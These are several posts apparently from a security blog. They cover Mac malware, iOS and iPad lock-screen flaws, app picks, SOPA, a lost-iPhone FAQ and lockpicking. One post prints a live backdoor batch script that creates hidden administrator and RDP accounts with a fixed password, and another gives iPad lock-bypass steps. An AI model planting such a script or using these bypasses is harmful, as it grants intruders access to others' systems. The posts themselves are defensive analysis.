Apparently the team behind this malware is quite efficient at updating it, and so they have been successful in spreading it around. Lion doesn’t come with Java by default, so unless you’ve manually installed it, you’re safe. If you have installed Java on Lion however, I don’t know yet whether Lion’s built-in anti-malware is being updated quickly enough to keep up with the new malware variants (although I highly doubt it).

If you are running Snow Leopard (or earlier), or Lion with a manually-installed Java, then the best thing to do is disable it. The majority of web users do not need Java on a regular basis. I recommend disabling Java system-wide by going to Applications > Utilities > Java Preferences and then unchecking all the checkboxes in the General tab. If you use Safari to browse, you can disable Java by going to Safari > Preferences > Security and unchecking ‘Enable Java‘.

Keep an eye out for an upcoming Java update from Apple.

[Updated] Seems all the talk about this has nudged Apple to act! They’ve released Java for OS X Lion 2012-001 and Java for Mac OS X 10.6 Update 7. F-Secure have released a free Flashback remover tool, and Apple have announced they are also working on software to detect and remove Flashback malware.

Source: F-Secure

Related posts:

1. Java Security Updates for Leopard and Snow Leopard
2. Apple-Produced Java Runtime Deprecated
3. Mac OS X Security Update 2011-003 adds MACDefender Protection [Updated]

As always, the best setting for Require Passcode is Immediately. That way you know that when you lock your device, it is actually locked, and will prevent someone from gaining access to it without the passcode within the minutes following the ‘lock’.

Sadly people seem all too eager to rush and report on iOS vulns before actually verifying them.

TDLR; There is no lock screen bypass in iOS 5.1 using the new camera shortcut. They were wrong.

Related posts:

1. iPad Lock Screen Bypass Vulnerability using Smart Cover [Patched]
2. Securing Siri on a Locked iPhone 4S
3. Charlie Miller Discovers iOS Code-Signing Bypass Vulnerability

If you’re only interested in my recommended security apps, they’re at the bottom! Feel free to post in the comments if you have any you think are worth mentioning.

Communications

Adium   This is by far the best instant messaging app out there, on any platform. It supports all of the different IM networks (as well as other stuff like IRC), and is extremely customisable with a variety of plugins and themes.

Colloquy  Out of the IRC apps I’ve tested, Colloquy is definitely the better one. It’s not as versatile as some others out there, but it’s stable and works well.

Multimedia

 VLC  Again, this is the best media player on any platform. Plays a wide variety of audio and video formats, and has a large number of great features. Must have.

 Perian (and Flip4Mac)  Perian is a great plugin that gives QuickTime the ability to natively read a whole bunch of additional audio and video formats. If you really need to read Windows Media format (who does these days?), then Flip4Mac brings that functionality. You probably don’t need this if you use VLC.

 HandBrake  Need to rip a DVD (legally of course ;)? Then this is your tool. Simple interface, with options to export for iPhone, iPad etc.

 ScreenFlow ($99): Although Lion’s built-in QuickTime Player can do audio and screen recording, if you want to make proper little screencast videos with transitions and zooming, nothing beats ScreenFlow. So easy to use too.

Text Editors

TextWrangler  While OS X’s built-in TextEdit is decent, it’s not great when you’re editing code. The best free solution that I’ve found is TextWrangler (essentially the free version of BBEdit). It’ll do syntax colouring for a variety of languages, and has quite a few powerful features. That said, I’ve personally found one of the two paid-for apps below to be slightly better.

TextMate ($53): Just a powerful lightweight code editor. Usually my favourite. Pretty expensive though.

SubEthaEdit ($38): Powerful code editor with collaborative capabilities and live rendering of HTML. Better priced than TextMate.

Network File Transfer

Cyberduck  This free app will meet most of your file transfer needs with its support for FTP/SFTP, WebDAV, Amazon S3, Google Cloud Storage, Google Docs, Windows Azure, and Rackspace Cloud Files. You can directly edit remote files, and have them automatically re-uploaded when the file is saved.

Transmit: Although Transmit doesn’t offer that much more functionality over Cyberduck, the guys over at Panic have spent a lot of time thinking about a few key features and UI design that make Transmit a more comfortable client to use. The interface is cleaner and more intuitive, and one nice feature is the ability to mount any of your remote file stores as an actual local disk.

Transmission  A clean and easy-to-use BitTorrent client. It’s got a remote web interface that you can connect to in order to manage your torrents.

News/Social Media

 NetNewsWire  Clean user interface, and the ability to manage your subscriptions into folders. You can also sync all of your RSS feeds with Google Reader for easy reading on the go. There’s also an iPhone and iPad client.

 Twitter  I haven’t found any particularly outstanding Twitter clients on any platform, but Twitter’s own OS X client is a good all-rounder.

Security

Firewalls

Although the Mac’s built-in firewall does a pretty good job for the majority of users, it doesn’t allow granular control of inbound traffic, and doesn’t do any outbound connection filtering. This is one area where a free app isn’t quite as good as the paid-for alternatives.

 Little Snitch ($29.95): Since Little Snitch came out several years ago, it’s been a must-have for anyone who wants to be able to control outbound connections from their Mac. Whenever an app tried to make a connection to a non-whitelisted destination, you’ll get a warning where you can allow/deny.

 Hands Off! ($24.95): This is a fairly recent competitor to Little Snitch, but it seems like they’ve done a pretty good job. It offers the same outbound connection filtering capabilities as Little Snitch, but it also does disk access filtering, which allows you to control which apps can write to disk. Hands Off is also cheaper!

NetBarrier (VirusBarrier, $49.95): Intego are a great supplier of Mac security software. Out of all their apps, their NetBarrier firewall is by far my favourite. Although its UI is a bit over-done, it offers a great granular firewall and has a very basic built-in Intrusion Detection System that can detect some network-based attacks. Note that NetBarrier has been integrated into VirusBarrier, so you now get a dual package of anti-virus and firewall!

TCPBlock  The only free app in this category, TCPBlock offers basic outbound filtering capabilities. Although not as advanced as Little Snitch or Hands Off, it allows you to whitelist/blacklist which apps are allowed to access the internet.

Encryption

 GPGTools  If you are interested in sending or receiving encrypted  or digitally-signed email, then the great GPGTools suite is for you. It can also do file encryption using public/private keys.

 TrueCrypt  Although OS X’s built-in AES-encrypted disk images are good, they only work on OS X. The cross-platform TrueCrypt allows you to create encrypted disk images that will work on any computer.

Passwords

 KeePassX  If you have a lot of passwords and really want a place to store them securely, then a password manager like KeePassX is the way to go.

 1Password ($49.99): Out of all the password managers, 1Password is definitely the best, although I do find it a bit pricey. Its sleek UI and unique touches make it a great app to have. It has clients for Mac, Windows, iPhone, iPad and Android, so you can take your password with you everywhere!

Utilities

 Carbon Copy Cloner  This is a great tool for creating copies of your disks for backup purposes. You can either mirror one disk onto another, or just clone a disk into a disk image. I’ve relied on CCC many times throughout the years.

 MenuMeters  A neat little utility that allows you to add some useful graphs to your OS X menu bar, to display bandwidth, disk usage, CPU usage, etc.

 iStat Menus ($16): Similar to MenuMeters, but with a nicer interface, and more options. If you want a nice system monitor tool, and are willing to pay

Related posts:

1. Sophos Offers Free Mac Anti-virus
2. OS X Lion Released, Brings Improved Security
3. GPGTools Release Unified Installer for MacGPG/GPGMail

Anyone who follows Security Generation will know that I’m a big advocate of civil liberties and freedom in general. The internet is currently a multicultural and multimedia hub of information, ideas, creativity and innovation, and there is a risk this could be irrevocably changed. Granted there is also a lot of crap on the internet, but freedom works both ways. Whilst the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) intend to reduce piracy on the net, in reality they would hand vast amounts of power over to industry copyright holders, who would then have the ability to have sites blocked and content taken down, inhibit free speech and bring . For more information about all of this, check out this good summary article.

Due to the threat that these acts would pose to the open internet, many large internet companies have stated their opposition including Google, Yahoo!, Twitter, eBay, and Wikimedia, as well as civil liberties groups such as the ACLU and the EFF. On January 18, these and countless other blogs and sites, including Security Generation, will be protesting this legislation by blacking out (read: censor) parts of their sites and educating users about the danger of american censorship.

If you have a blog or website, you’re encouraged to add your voice to the cause. CloudFlare users will be able to easily participate just by enabling the new Stop Censorship app, which will black out large chunks of text on your site, and inform your users about the dangers presented by this type of legislation. WordPress users without CloudFlare can also join in by installing one of the many Stop SOPA/PIPA plugins.

This is my favorite anti-SOPA song so far:

http://www.youtube.com/watch?v=hi4kfTah7yI

This one is also good.

Related posts:

1. Egyptian Government Fighting Protesters, Shuts Down Internet

1. Can I put some contact details on my iPhone’s screen in case it’s found by someone?: I’ve put together the free iPhone Lockscreen Generator to make this task easy! Find My iPhone also allows you to remotely display a custom message on your phone’s screen.
2. Can I locate my iPhone/iPad if I didn’t have Find My iPhone configured on it?: Unfortunately not. Find My iPhone (or another tracking program) is the only way for you to locate your device.
3. Can I locate my iPhone/iPad if I had Location Services turned off, or Airplane Mode turned on?: No, both of these settings prevent your device from reporting its location to the Apple servers (this includes 3rd party tracking services too).
4. Can I find my iPhone/iPad when it is turned off (or battery is dead)?: Simply put, you can’t. The device needs to be on (and have a network connection) in order for it to appear in Find My iPhone for you to track it.
5. Can I find my iPhone/iPad if the SIM card is removed?: Yes, this is possible, but only if the device is turned on and connected to a Wifi network. This would allow the device to return its GPS location to Find My iPhone.
6. Can I track my iPhone/iPad if it’s been erased or restored?: If your device has been restored (or erased using the ‘wipe’ functionality), you will no longer be able to track it.
7. Can I track my iPhone/iPad using its IMEI or Serial Number?: No, it’s not possible for consumers to track a device using its IMEI or Serial Number. In some cases the police/telco may be able to track a phone using its IMEI.
8. What should i do if I lost my iPad and cannot locate it?: Ummm… Step 1: panic, Step 2: if you had Find My iPhone set up on it, you can request it to send you an email if/when the device is located. Otherwise report it lost/stolen to the police (give them its Serial Number), and if it’s found they may return it to you.
9. Is there a reason to not wipe a lost iPhone?: This is a particularly good question. One reason to not wipe it would be so that you can continue tracking it and hopefully recover it. The other side of the coin is the security and privacy side. If the data on the device is extremely private or sensitive, then you may sleep better knowing it’s been wiped.
10. Can I start using iCloud after my iPhone is stolen to wipe the phone?: No, if you didn’t already have iCloud set up on your device with Find My iPhone enabled, you can’t do so after the device is stolen.
11. My iPhone/iPad was only protected with the PIN, will the thief be able to crack it?: It’s unlikely. If they manually enter the wrong PIN too many times, they’ll get locked out. Here’s Apple’s statement about this: ”If you repeatedly enter the wrong passcode, your iPhone, iPad, or iPod touch will be disabled for longer intervals before you can try again. After too many unsuccessful attempts, you won’t be able to try again until you connect it to the computer with which you last synced it.” That said, someone with with the necessary technical knowledge, and access to specialised forensics tools would be able to brute force it and gain access to the data.
12. I had Find My iPhone disabled, but can I track my iPad through iCloud’s Photo Stream if the thief starts taking pictures?: If they take pictures with Geotagging, then you would be able to find out where those pictures were taken (the GPS info is stored in the picture’s metadata). So, if they take a picture whilst at home for example, you could find out (approximately) where that is.
13. I accidentally removed my device from Find My iPhone while it was offline, will I still be able to track it?: Yes, if your device is able to get back online and still has Find My iPhone enabled, it will automatically reappear in Find My iPhone.
14. If I remote lock my iPhone, can someone still access it?: Only if they already know the currently-set PIN.

Related posts:

1. Find My iPhone Brings Improved Offline Device Support
2. Protecting and Recovering Your iPhone and iPad from Loss and Theft
3. iPhone/iPad iOS 4.3.3 Fixes Location Tracking Bugs

A tip is all good and well, but creating such a customised image may be beyond the technical abilities of your average iPhone user, so I hacked together the brand new iPhone Lockscreen Generator!

http://lockscreengenerator.com

This free online tool allows anyone to create a customised lockscreen (currently with one of four background images), in less than a minute. Just enter your contact details (first name, alternate contact number), and maybe a short note for whomever finds your iPhone (reward maybe?), click generate, then tap/click on the image to download it. You can do this on your computer, and email yourself the image, or do it directly on your iPhone.

Once downloaded to your iPhone, you can set the image as your lockscreen wallpaper by going into the Photos app, tapping your image, then tap the ‘send to’ icon in the bottom left-hand corner of the screen, select Use as wallpaper > Set > Set Lock Screen.

Don’t forget to share this with your friends! You can even use one of the share links below ;) If you have any feedback or tips, let me know.

No related posts.

Apple reviews every app submitted to the App Store, which has meant that iOS users have not had to worry about outright malware. Since this vulnerability allows the apps to fetch code remotely, they can perform actions not reviewed by the App Store staff. Charlie had submitted a proof-of-concept app that was approved (see video below), but has since been removed by Apple.

The reason this vulnerability works is based around some changes Apple made in iOS 4.3 last year, which allowed Mobile Safari to run javascript at a more privileged level on the devices. This change required Apple to make an exception for Safari to execute unsigned code in a particular area of memory. Charlie Miller’s bug is allegedly a very unique case that allows any app to take advantage of this, and hence run their own unsigned code.

http://www.youtube.com/watch?v=ynTtuwQYNmk

Charlie will be presenting the vulnerability in detail at the SysCan conference in Taiwan next week. Apple has already released a developer beta of iOS 5.0.1 which patches the recent iPad Smart Cover lock screen bypass, but I would not be at all surprised if they release another beta which includes a fix for this bug. Until then, be careful to only install apps from developers you trust.

[Update] Apple has kicked Charlie out of the Developer program. At first I felt that this was an extremely bad reaction on Apple’s part. That said, Apple is probably most upset that Charlie’s proof-of-concept app could have been installed by legitimate users. Regardless of Charlie’s intentions, this could constitute malware, and he should have removed the app as soon as he saw the flaw existed. The posting of his video above probably didn’t help matters either.

Related posts:

1. iPad Lock Screen Bypass Vulnerability using Smart Cover [Patched]
2. JailbreakMe and the PDF Exploit
3. Apple QuickTime 7.6.7 “_Marshaled_pUnk” Code Execution Vulnerability and Metasploit Exploit

When going to check the Windows hosts file to make sure there weren’t any modifications made to it, the following suspicious files were found in %systemroot%\system32\drivers\etc\

1.exe
2.exe
gm.dls
gmreadme
logoff.exe
netstat.exe
query.exe
t.msc
ts.exe

After some analysis, none of these files were found to be inherently malicious, but are instead used by a malicious batch script to enable the Guest and Support accounts with a specific password, and add them to the Admins and RDP group. The 1.exe file, for example, is just a executable with account-management capabilities.

In C:\WINDOWS\Application Compatibility Scripts\Install\Template there was a batch script called “.bat” with the following contents:

@cd %systemroot%\system32\drivers\etc\
@1 localgroup “Remote Desktop Users” SUPPORT_388945a0 /add
@1 localgroup “Remote Desktop Users” guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes

At this point it’s fairly evident what’s going on, this bat script is being run periodically, and runs 1.exe to ensure that both the Guest and Support_338945a0 accounts are present, and in the Administrators and Remote Desktop Users groups. It also sets the password to both of those accounts to ‘QQqqaa123321′. If you find these files on your system, consider that server compromised. Remove the files and disable those accounts in the first instance, but a full rebuild is highly recommended to rule out the possibility of other backdoors or rootkits.

These types of batch scripts are not uncommon for backdoor trojans. However, I couldn’t find any references to this particular backdoor, so thought I would post about this in case anyone else searches for information about it. Note that at the time of writing, this batch script is not picked up by any anti-virus software.

Related posts:

1. New Mac OS X Backdoor Trojan (BlackHole RAT) in Development [Updated]
2. Gawker Media Hacked and Accounts Compromised
3. Inform your Friends about their Hacked Accounts

By holding the power button to bring up the ‘Power Off’ screen, closing the smart cover, re-opening it (or just sliding a fridge magnet along the right-hand side of the device), and clicking cancel, the attacker will be dropped into the screen that was open before the iPad was locked. If the attacker gets dropped into the home screen, then they’ll be able to see the installed apps, but won’t be able to open anything. If Safari or Mail (or any other app) was the open when the device was locked, then the attacker would have access to that app.

Unlike Siri being available from the lock screen, which is not a security flaw (an unintended behaviour), this one actually is; and although an attacker does not get full control of the iPad, the severity depends on whether a sensitive app was being used before the device was locked.

Luckily it is possible to protect yourself against this bug in the interim by disabling Smart Covers in Settings > General > iPad Cover Lock/Unlock > Off. Expect Apple to patch this in iOS 5.0.1. Check out 9to5′s video below for a demonstration:

http://www.youtube.com/watch?v=NLgQ22naQhE

[Update] Apple did indeed patch this bug in iOS 5.0.1. Those of you who disabled your Smart Covers for security purposes can now re-enable them!

Related posts:

1. There Is No Camera Lock Screen Bypass in iOS 5.1
2. Charlie Miller Discovers iOS Code-Signing Bypass Vulnerability
3. Safari Errorjacking Vulnerability and Exploit [Patched]

I had the pleasure of taking part in the Defcon 19 Gringo Warrior contest where participants must bypass a series of locks to ‘escape’. It’s scored based on time and difficult of locks picked. I scored about above average. In this post I’m going to give my own shotgun intro to lockpicking, and provide some videos and links to other useful references where you can go find more detail.

 The Basics

There aren’t too many things you need to understand in order to get into basic lockpicking, but the first thing is to understand the internal components of a basic pin tumbler lock, and how a key activates them in order to open it. In short: every lock has a keyway, and one or more stacks of pins consisting of (from the bottom) a bottom pin, a top pin (aka. driver pin), and a spring.

When the correct key is inserted into the keyway, the pins are raised in such a way that the top pins and bottom pins are positioned on either side of the ‘shear line’. That’s the line within the lock where the plug rotates. Once all pins are aligned correctly, the plug can turn and the lock opens. The video below depicts this concept a bit more clearly.

http://www.youtube.com/watch?v=QiYIYXEX9Ko

Picking and Raking

The aim of lockpicking is to achieve the same outcome, by sequentially pushing pins in the correct order. In order to do so it’s necessary to apply torque to the lock, essentially the same a turning the key in the lock. To do so we use a torque wrench (or tensioner) – essentially a bent piece of metal – to apply a very light amount of torque. One tip here is to apply a very light touch on the torque wrench. Most beginners tend to apply force, essentially squeezing the pins and not allowing them to move. The pressure you apply should be no more than needed to start the plug turning, and it takes lots of practice to get used to. Lockpicking itself actually exploits slight manufacturing flaws in the drilling of the stack holes. By applying torque the plug will bind (get stuck) on the first pin that’s currently ‘in the way’. By gradually pushing up the correct pins using a pick, the pin will ‘set’ into its ‘open’ position, the plug will turn ever so slightly, each time binding on the next pin that’s in the way, until eventually all top pins are out of the way, and the lock can open.

Single-pin picking is the process of pushing individual pins as described above. Another method of achieving the same result faster, and easier for beginners, is called raking. Raking is usually done using a rake pick, and involves sliding the pick across the top of the pins whilst applying torque. The idea behind raking is to get multiple pins to ‘set’ at once, thus expediting the process. Note that for higher quality locks, the effectiveness of raking diminishes. An example of raking is shown in the video below.

http://www.youtube.com/watch?v=wemp-8WD9dY

With raking, my recommendation is usually to sort of ‘caress’ the top of the pins in a cyclical motion. With lockpicking in general, you should always try to have a fairly light touch. The picks should move in and out of the keyway horizontally; there shouldn’t be any twisting, turning or bending of the picks themselves (or any other motion that would cause them to come out mangled). When starting out, just practice pushing down each pin one by one, getting a feel for the feedback through the pick. Learn when a pin is binding, and the slight movement when the plug turns ever so slightly; these are the basics that experienced lockpickers do as second nature.

Learning

I saw Schuyler Towne’s presentation at DC19, and he just recently released a 24-video series on introductory lockpicking, which includes a segment on how to make your own. If you’re just starting out I highly recommend watching these. Just click play below and the entire series will play through.

http://www.youtube.com/watch?v=VVSL0liiWoc

There are countless other lockpicking videos on YouTube, so it’s worth having a look on there. I also recommend checking out the MIT Guide to Lockpicking which has a bunch of useful info on the topic. If you want a good book to learn lockpicking, then you probably can’t do much better than Deviant Ollam’s Practical Lock Picking (it’s also worth checking out his site).

 Getting Equipped

In order to start lockpicking, you’re going to need some picks. A basic 8-pick set is more than enough for the majority of situations. You can even start out by just getting one diamond pick, one snake pick/rake, and one tensioner. Southord produce some high quality picks, I own their 8-pick set as well as their jacknife set. If you’re interested in learning about the different types of picks, check out this DerbyCon talk by Deviant Ollam. Note that the laws around owning lockpicks differ by state and country. Familiarise yourself with the laws in your area before trying to get any picks!

The following sites are some other decent places to get picks:

• http://www.devonlocks.com/ (UK)
• http://www.lockpickshop.com/ (US)
• http://serepick.com/ (Custom tools)

Although I don’t recommend them for beginners, it is entirely possible to make a usable ‘emergency’ lockpick and tension wrench using nothing but paperclips!

Conclusion

Lockpicking is great fun, but takes a lot of practice to get right. The reason I kept this short is because you can read countless books and articles, and watch endless videos, but you’ll never actually progress unless you get hands-on. So get some picks, grab some padlocks and give it a try! If you ever get to go to a security conference, check out whether it has a lockpicking village, as they’re great places to try your hand at new locks and meet some experienced pickers. Remember to only pick locks you have permission to use, and don’t pick locks you rely on, as it’s possible to damage or destroy a lock if you do it wrong! Enjoy.

P.S. Every so often you’ll go to pick a lock and discover an altogether bigger problem, like I did in my hotel room in Hawaii.

Related posts:

1. Pic of the Week: Total Security Epic Fail Theater